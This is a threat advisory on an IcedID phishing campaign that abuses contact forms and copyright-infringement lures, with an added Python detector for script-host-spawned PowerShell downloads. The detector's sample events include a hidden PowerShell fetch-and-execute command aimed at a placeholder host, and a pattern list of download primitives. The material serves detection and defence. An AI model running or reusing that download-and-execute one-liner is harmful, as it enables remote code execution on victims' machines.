Rewterz Threat Advisory – CVE-2021-29302 – TP-Link TL-WR802N and Archer_C50v5_US devices buffer overflow
April 13, 2021Rewterz Threat Alert – Kimsuky APT group – IOCs
April 13, 2021
Severity
High
Analysis Summary
IcedID is a modular banking trojan that infects a device and deploys additional malware to access and steal financial information, including usernames and passwords, from online banking sessions. It uses multiple injection methods to bypass CAPTCHA protection.
The recent phishing campaign uses website contact forms to evade detection and floods companies with an immense number of phishing and spam messages. The threat is amplified because the malware can target the victim company's secure email gateways and land directly in the user's primary inbox, where it would otherwise have landed in the target's spam folder.
What is more worrisome is that the attackers threaten and blackmail the victims with claims of copyright infringement, further increasing the attack's effectiveness.
Another tactic used by the attackers is to use COVID-19 information and related health-themed emails to attract potential victims.
When unwitting victims click on the links to the supposed evidence of their copyright infringement, they are asked to log in via Google. At this point a .js file is silently downloaded to their desktop, and the device becomes compromised. PowerShell and WScript are then used to download the Cobalt Strike Beacon and the IcedID payload, which is how the malware establishes itself on the victim's device.
The IcedID malware is region-specific, as it targets users in Italy. Furthermore, the infected emails carry ZIP files and use "fake reply" techniques in European languages to increase their effectiveness.
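As an added defender-side example (not part of the Rewterz advisory), the following Python flags the two stages of the chain described above in constructed process-creation records: a script host running a .js file from a user-writable path, and PowerShell spawned by that script host with a download primitive. The event layout, field names and sample lines are assumptions, not real telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-creation events (Sysmon Event ID 1 style,
# flattened to "parent_image|image|command_line"); not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\a\Downloads\Copyright_Evidence.js",
    r"C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-Process",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\scripts\inventory.js",
]

@dataclass
class Finding:
    rule: str
    command_line: str

# Download-capable PowerShell primitives commonly seen when a script host hands off to PowerShell
DOWNLOAD_PATTERNS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# .js or .jse file under a user-writable location (Downloads, Desktop, AppData)
USER_PATH_JS = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata)\\[^ ]+\.jse?\b", re.IGNORECASE)

def parse_event(line: str) -> dict:
    parent, image, cmd = line.split("|", 2)
    # Keep only the executable name for matching; paths vary between hosts
    return {"parent": parent.lower().rsplit("\\", 1)[-1],
            "image": image.lower().rsplit("\\", 1)[-1],
            "cmd": cmd}

def evaluate(line: str) -> list:
    ev = parse_event(line)
    findings = []
    # Rule 1: a script host executing a .js/.jse dropped into a user-writable path
    if ev["image"] in SCRIPT_HOSTS and USER_PATH_JS.search(ev["cmd"]):
        findings.append(Finding("script_host_user_path_js", ev["cmd"]))
    # Rule 2: PowerShell spawned by a script host and invoking a download primitive
    if ev["image"] in ("powershell.exe", "pwsh.exe") and ev["parent"] in SCRIPT_HOSTS \
            and DOWNLOAD_PATTERNS.search(ev["cmd"]):
        findings.append(Finding("script_host_to_powershell_download", ev["cmd"]))
    return findings

def scan(events: list) -> list:
    return [f for line in events for f in evaluate(line)]
```

Running `scan(SAMPLE_EVENTS)` yields one finding per stage for the first two records and nothing for the benign PowerShell and administrative script lines.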
Impact
- User login credentials and bank account access are compromised.
- Financial information held by banking services and institutions is targeted.
- Browser traffic is monitored.
- It also acts as a dropper for other malware.
Remediation
- Keep antivirus applications updated.
- Perform consistent anti-malware scans of the system to ensure the known malware and viruses are promptly spotted and mitigated.
- Enable two-factor authentication techniques.
- Update all applications and software and install the latest patches.
- Create policies and take steps to ensure that malicious emails end up in the spam folder.
- If a file is perceived to contain malicious software, open it in a virtual environment.